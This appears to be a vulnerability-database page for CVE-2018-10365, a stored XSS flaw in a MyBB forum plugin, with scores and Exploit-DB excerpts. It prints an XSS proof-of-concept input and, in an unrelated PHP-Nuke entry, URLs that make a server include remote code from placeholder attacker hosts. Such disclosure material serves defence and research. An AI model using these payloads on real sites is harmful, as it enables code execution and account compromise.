CVE-2018-10365
published 2018-05-01CVE-2018-10365: An XSS issue was discovered in the Threads to Link plugin 1.3 for MyBB. When editing a thread, the user is given the option to convert the thread to a link…
PriorityP430medium5.4CVSS 3.0
AVNACLPRLUIRSCCLILAN
EXPLOIT
EPSS
1.58%
72.5th percentile
An XSS issue was discovered in the Threads to Link plugin 1.3 for MyBB. When editing a thread, the user is given the option to convert the thread to a link. The thread link input box is not properly sanitized.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| threads_to_link_project | threads_to_link | — | — |
CVSS provenance
nvdv3.05.4MEDIUMCVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MyBB Threads to Link Plugin 1.3 - Cross-Site Scripting
exploitdb·2018-04-26·CVSS 5.4
CVE-2018-10365 [MEDIUM] MyBB Threads to Link Plugin 1.3 - Cross-Site Scripting
MyBB Threads to Link Plugin 1.3 - Cross-Site Scripting
---
# Exploit Title: MyBB Threads to Link Plugin v1.3 - Persistent XSS
# Date: 3/15/2018
# Author: 0xB9
# Contact: luxorforums.com/User-0xB9 or 0xB9[at]protonmail.com
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1065
# Version: v1.3
# Tested on: Ubuntu 17.10
CVE: CVE-2018-10365
1. Description:
When editing a thread the user is given to the option to convert the thread to a link.
2. Proof of Concept:
Persistent XSS
- Edit a thread or post you've made
- At the bottom of the edit page in the Thread Link box input the following alert("XSS")">
- Now visit the forum your thread/post exists in to see the alert.
3. Solution:
The plugin has since been removed after notifying the author.
Patch in line 83:
$threa
Exploit-DB
PHP-Nuke 6.x/7.x - 'Modpath' File Inclusion
exploitdb·2004-05-17
CVE-2004-2018 PHP-Nuke 6.x/7.x - 'Modpath' File Inclusion
PHP-Nuke 6.x/7.x - 'Modpath' File Inclusion
---
source: https://www.securityfocus.com/bid/10365/info
PHP-Nuke is prone to a potential file include vulnerability. This issue could allow a remote attacker to include malicious files containing aribtrary code to be executed on a vulnerable system. This issue can be exploited via the 'modpath' parameter.
If successful, the malicious script supplied by the attacker will be executed in the context of the web server hosting the vulnerable software.
http://www.example.com/nuke73/index.php?modpath=ftp://attacker.com/directory/
http://www.example.com/nuke73/index.php?modpath=//attacker_ip/share_name/
No writeups or analysis indexed.
2018-05-01
Published